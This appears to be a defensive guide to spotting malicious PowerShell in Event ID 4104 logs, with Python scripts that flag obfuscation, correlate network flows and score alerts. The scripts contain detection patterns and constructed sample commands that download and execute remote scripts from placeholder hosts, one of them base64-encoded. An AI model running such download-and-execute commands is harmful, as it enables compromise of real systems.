Steps to Analyze PowerShell Logging (Event ID 4104) for Malicious Activity

PowerShell logging (Event ID 4104) provides critical visibility into script block execution. Detecting malicious activity requires systematic analysis of logged commands, behavior patterns, and context.


1. Enable Detailed PowerShell Logging

What to Do:

  • Configure PowerShell to log detailed script block execution using Event ID 4104.

  • Enable additional logging options such as:

    • Script Block Logging: Captures executed PowerShell commands.

    • Module Logging: Tracks loaded modules and their usage.

    • Transcription Logging: Logs all input and output from PowerShell sessions.

Why It Matters: These settings ensure comprehensive visibility into all executed PowerShell commands and scripts.


2. Review Suspicious Commands

What to Look For:

  • Network Activity: Use of commands like Invoke-WebRequest (to download remote content) or Invoke-Expression (to execute downloaded code in memory).

  • Encoded Commands: -EncodedCommand often conceals malicious payloads.

  • Policy Bypass: -ExecutionPolicy Bypass to override execution policies and run unsigned scripts.

  • Malicious Script Content: Commands to disable security tools, establish persistence, or exfiltrate data.

Analysis Tip: Legitimate scripts rarely combine these flags and commands unless an administrator is doing so deliberately.


3. Check for Obfuscation

What to Look For:

  • Base64 Encoding: Encoded scripts that appear as long strings of seemingly random characters.

  • String Splitting: Commands split across multiple concatenated parts (e.g., "I"+"nvo"+"ke-Co"+"mmand").

  • Excessive Use of Aliases: Abbreviations like iwr for Invoke-WebRequest.

Legitimate Scripts: Typically use readable and straightforward code for debugging and maintenance purposes.
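To make steps 2 and 3 concrete, here is an added Python example (not code from the original page) that runs the checks above over a few constructed ScriptBlockText values of the kind recorded in Event ID 4104. It decodes -EncodedCommand arguments (PowerShell expects base64 of UTF-16LE text), rejoins split string literals so the intended cmdlet name becomes visible, and reports which indicators fired at each layer. The sample blocks, the example.invalid URLs and the indicator names are assumptions constructed for illustration.

```python
import base64
import re

# Indicator patterns taken from the page's "what to look for" lists (matched case-insensitively).
PATTERNS = {
    "network_download": r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile|Net\.WebClient)\b",
    "invoke_expression": r"\b(Invoke-Expression|iex)\b",
    "execution_policy_bypass": r"-e(?:xecutionpolicy|p)\s+bypass\b",
    "security_tool_tampering": r"\bSet-MpPreference\b.*-Disable",
    "long_base64_string": r"[A-Za-z0-9+/]{40,}={0,2}",
}
# Aliases that shorten cmdlet names; maintenance scripts normally spell the cmdlet out.
ALIASES = {"iex", "iwr", "irm", "sal", "curl", "wget"}
# -EncodedCommand may be abbreviated (-e, -ec, -enc); its argument is base64 of UTF-16LE text.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# A '+' joining two string literals; two or more joins means a literal split into 3+ pieces.
SPLIT_JOIN = re.compile(r"""["']\s*\+\s*["']""")
# "a"+"b" literal concatenation, used to rebuild the original string.
CONCAT = re.compile(r"""(["'])([^"']*)\1\s*\+\s*(["'])([^"']*)\3""")


def decode_encoded_commands(text):
    """Return the plaintext of every -EncodedCommand argument that decodes cleanly."""
    decoded = []
    for match in ENCODED_ARG.finditer(text):
        try:
            decoded.append(base64.b64decode(match.group(1), validate=True).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue  # garbage after -enc is still flagged as encoded_command by the caller
    return decoded


def reassemble_split_strings(text):
    """Join "a"+"b" literal concatenations until nothing changes, exposing the intended name."""
    previous = None
    while previous != text:
        previous = text
        text = CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', text)
    return text


def analyze_script_block(text, _depth=0):
    """Analyze one 4104 ScriptBlockText value.

    Returns {"indicators": sorted names, "decoded": payloads recovered from
    -EncodedCommand, "normalized": the text with split strings rejoined}.
    Indicators found inside a decoded payload are prefixed with "decoded:".
    """
    indicators = set()
    # Replace encoded arguments with a placeholder so the base64 blob cannot produce
    # accidental keyword matches; the blob is decoded and analyzed separately below.
    visible = ENCODED_ARG.sub("-EncodedCommand <base64>", text)
    if visible != text:
        indicators.add("encoded_command")
    if len(SPLIT_JOIN.findall(visible)) >= 2:
        indicators.add("string_splitting")
    normalized = reassemble_split_strings(visible)
    for name, pattern in PATTERNS.items():
        if re.search(pattern, normalized, re.IGNORECASE):
            indicators.add(name)
    if any(word.lower() in ALIASES for word in re.findall(r"[A-Za-z][A-Za-z-]+", normalized)):
        indicators.add("alias_usage")
    decoded = decode_encoded_commands(text)
    if _depth < 3:  # bound recursion for payloads that nest further encoded commands
        for payload in list(decoded):
            inner = analyze_script_block(payload, _depth + 1)
            indicators.update("decoded:" + name for name in inner["indicators"])
            decoded.extend(inner["decoded"])
    return {"indicators": sorted(indicators), "decoded": decoded, "normalized": normalized}


def _encode_command(script):
    """Build a -EncodedCommand argument the way PowerShell expects it (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed ScriptBlockText samples for illustration, not real captured 4104 events.
SAMPLE_SCRIPT_BLOCKS = {
    "plain_download": "Invoke-WebRequest -Uri http://example.invalid/a.txt -OutFile C:\\Temp\\a.txt",
    "encoded_nested": "Start-Process powershell.exe -ArgumentList '-NoProfile -enc "
    + _encode_command("Invoke-Expression (Invoke-WebRequest http://example.invalid/p.ps1).Content")
    + "'",
    "split_string": '& ("I"+"nvo"+"ke-Co"+"mmand") -ScriptBlock { Get-Process }',
    "aliased": "iex (iwr http://example.invalid/p.ps1)",
    "benign_maintenance": "Get-ChildItem -Path C:\\Logs -Filter *.log | Measure-Object",
}

if __name__ == "__main__":
    for name, block in SAMPLE_SCRIPT_BLOCKS.items():
        result = analyze_script_block(block)
        print(f"{name:20} {result['indicators']}")
        for payload in result["decoded"]:
            print(f"{'':20} decoded: {payload}")
```

Run it directly to see each sample scored; the nested sample shows why decoding matters, since the outer script block mentions no download or Invoke-Expression at all and only the decoded layer reveals them. The benign maintenance command produces an empty indicator list, which is the baseline a tuned rule set should hit for routine administrative scripts.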


4. Correlate with Network Activity

What to Do:

  • Compare PowerShell logs with network traffic logs to identify external connections initiated by the script.

  • Focus on connections to:

    • Unknown or foreign IP addresses.

    • Domains flagged by threat intelligence feeds.

Red Flags: Outbound connections to download payloads, communicate with command-and-control (C2) servers, or exfiltrate data.


5. Analyze the Execution Context

What to Look For:

  • User Account: Scripts executed under privileged accounts (e.g., administrator or domain admin) demand attention.

  • Machine Context: Activity on critical systems like domain controllers, application servers, or financial systems is more suspicious.

  • Trigger Source: Investigate whether the script was:

    • Manually executed by a user.

    • Triggered by an automated process (e.g., Task Scheduler).

Context Clues: Legitimate scripts are often run by IT personnel for maintenance purposes, not end-users or unknown accounts.


6. Automate Detection

How to Implement:

  • Use SIEM (e.g., Splunk, QRadar) or EDR tools (e.g., CrowdStrike, Microsoft Defender) to:

    • Detect patterns indicative of malicious behavior.

    • Set alerts for specific keywords such as Invoke-WebRequest, -EncodedCommand, and obfuscated code.

  • Incorporate MITRE ATT&CK tactics to identify known PowerShell attack methods.

Benefit: Automation reduces manual effort and ensures consistent detection of malicious activity.
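The following added Python example (not part of the original page) shows steps 4 to 6 working together in the way a SIEM rule would: it joins constructed 4104 events with constructed outbound flow records from the same host inside a 60-second window, checks destinations against a threat-intel list, scores the step 6 keyword hits with a MITRE ATT&CK technique attached, and lets the step 5 execution context raise the priority of an existing hit without generating alerts on its own. The host names, user names, the 203.0.113.7 and 198.51.100.23 addresses, the parent-process labels and the weights are assumptions chosen for illustration.

```python
import re
from datetime import datetime

# Keyword alerts from step 6, each tagged with the MITRE ATT&CK technique it most often indicates.
KEYWORDS = {
    "network_download": (r"\b(Invoke-WebRequest|iwr)\b", "T1105 Ingress Tool Transfer"),
    "invoke_expression": (r"\b(Invoke-Expression|iex)\b", "T1059.001 PowerShell"),
    "encoded_command": (r"-e(?:nc|ncodedcommand)\b", "T1027 Obfuscated Files or Information"),
    "policy_bypass": (r"-ExecutionPolicy\s+Bypass\b", "T1059.001 PowerShell"),
}

# Environment knowledge a SIEM would hold; every value here is a constructed example.
CRITICAL_HOSTS = {"DC01"}
PRIVILEGED_USERS = {"CORP\\admin.ops", "CORP\\svc_backup"}
DOCUMENT_PARENTS = ("WINWORD.EXE", "EXCEL.EXE", "OUTLOOK.EXE")
AUTOMATED_PARENTS = ("Task Scheduler",)
THREAT_INTEL_IPS = {"203.0.113.7"}
INTERNAL_PREFIXES = ("10.", "192.168.")
CONTEXT_WEIGHTS = {"privileged account": 2, "critical host": 2, "launched from a document handler": 3}

# Constructed Event ID 4104 records, reduced to the fields a SIEM normalizes (not real logs).
EVENTS_4104 = [
    {"time": "2024-05-01T09:00:05", "host": "WS-042", "user": "CORP\\jdoe", "parent": "WINWORD.EXE",
     "script": "iwr http://203.0.113.7/p.ps1 | iex"},
    {"time": "2024-05-01T09:15:00", "host": "DC01", "user": "CORP\\svc_backup",
     "parent": "svchost.exe (Task Scheduler)",
     "script": "Get-ChildItem \\\\DC01\\Backup | Compress-Archive -DestinationPath D:\\Backup.zip"},
    {"time": "2024-05-01T10:30:00", "host": "DC01", "user": "CORP\\admin.ops", "parent": "explorer.exe",
     "script": "powershell -ExecutionPolicy Bypass -EncodedCommand <placeholder-base64>"},
]
# Constructed outbound flow records from the same hosts (firewall or NetFlow style).
NETWORK_FLOWS = [
    {"time": "2024-05-01T09:00:07", "host": "WS-042", "dst": "203.0.113.7", "dport": 80},
    {"time": "2024-05-01T09:15:02", "host": "DC01", "dst": "10.0.0.15", "dport": 445},
    {"time": "2024-05-01T10:30:01", "host": "DC01", "dst": "198.51.100.23", "dport": 443},
]


def correlate_flows(event, flows, window_seconds=60):
    """Step 4: flows from the same host that start within window_seconds after the script ran."""
    start = datetime.fromisoformat(event["time"])
    matched = []
    for flow in flows:
        if flow["host"] != event["host"]:
            continue
        delta = (datetime.fromisoformat(flow["time"]) - start).total_seconds()
        if 0 <= delta <= window_seconds:
            matched.append(flow)
    return matched


def execution_context(event):
    """Step 5: who ran the script, on which machine, and what launched it."""
    clues = []
    if event["user"] in PRIVILEGED_USERS:
        clues.append("privileged account")
    if event["host"] in CRITICAL_HOSTS:
        clues.append("critical host")
    if event["parent"].upper().startswith(DOCUMENT_PARENTS):
        clues.append("launched from a document handler")
    elif any(tag in event["parent"] for tag in AUTOMATED_PARENTS):
        clues.append("automated trigger")
    else:
        clues.append("interactive launch")
    return clues


def triage(event, flows):
    """Step 6: score content and network evidence first; context only amplifies a hit."""
    score, reasons = 0, []
    for name, (pattern, technique) in KEYWORDS.items():
        if re.search(pattern, event["script"], re.IGNORECASE):
            score += 3
            reasons.append(f"{name} [{technique}]")
    for flow in correlate_flows(event, flows):
        if flow["dst"] in THREAT_INTEL_IPS:
            score += 4
            reasons.append(f"connection to threat-intel listed {flow['dst']}")
        elif not flow["dst"].startswith(INTERNAL_PREFIXES):
            score += 1
            reasons.append(f"external connection to {flow['dst']}:{flow['dport']}")
    context = execution_context(event)
    if score > 0:
        # Context never creates an alert by itself; otherwise every privileged
        # maintenance job on a domain controller would page the on-call analyst.
        score += sum(CONTEXT_WEIGHTS.get(clue, 0) for clue in context)
    severity = "alert" if score >= 8 else "review" if score >= 3 else "info"
    return {"host": event["host"], "user": event["user"], "score": score,
            "severity": severity, "reasons": reasons, "context": context}


def run_detection(events=None, flows=None):
    """Triage every 4104 event; a SIEM would feed these results to its alert queue."""
    return [triage(e, flows or NETWORK_FLOWS) for e in (events or EVENTS_4104)]


if __name__ == "__main__":
    for result in run_detection():
        print(f"{result['severity']:6} score={result['score']:2} {result['host']} {result['user']}")
        for line in result["reasons"] + result["context"]:
            print("       -", line)
```

The scheduled backup job on DC01 stays at "info" even though it runs as a privileged account on a critical host, because nothing in its content or network behaviour matched; the two alerts come from keyword hits that the flow correlation and context then push over the threshold. Tune the weights and the time window against your own environment before relying on the thresholds.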


7. Response Actions

Immediate Steps:

  • Isolate the System: Disconnect the affected device from the network to prevent further compromise or lateral movement.

  • Block Network Connections: Restrict outbound traffic from the compromised machine.

  • Collect Forensic Evidence: Capture:

    • The full PowerShell session log.

    • Associated scripts, network traffic, and any dropped payloads.

Post-Incident Actions:

  • Conduct a thorough investigation to assess the scope and impact of the compromise.

  • Apply detection rules in security systems to flag similar activity in the future.

  • Update PowerShell policies to restrict usage:

    • Enforce Constrained Language Mode for non-administrative users.

    • Limit execution rights to specific roles or users.


Enhancing Detection and Prevention

Enable Advanced Monitoring:

  • Turn on Script Block Logging and Module Logging for deeper insight into executed scripts.

  • Leverage tools like Microsoft Advanced Threat Analytics (ATA) or Defender for Endpoint for real-time detection.

Restrict PowerShell Access:

  • Limit PowerShell usage to administrators and require Just-In-Time (JIT) access for elevated permissions.

  • Use Application Control Policies to block unauthorized scripts.

Educate Users and IT Staff:

  • Train personnel to recognize phishing emails and malicious documents that often trigger PowerShell attacks.

  • Ensure IT teams understand secure PowerShell practices.


Conclusion

By analyzing PowerShell logs (Event ID 4104) for suspicious commands, obfuscation, and execution context, organizations can identify potential threats early. Correlating log data with network activity and leveraging automated detection ensures a faster and more effective response to malicious PowerShell activity.
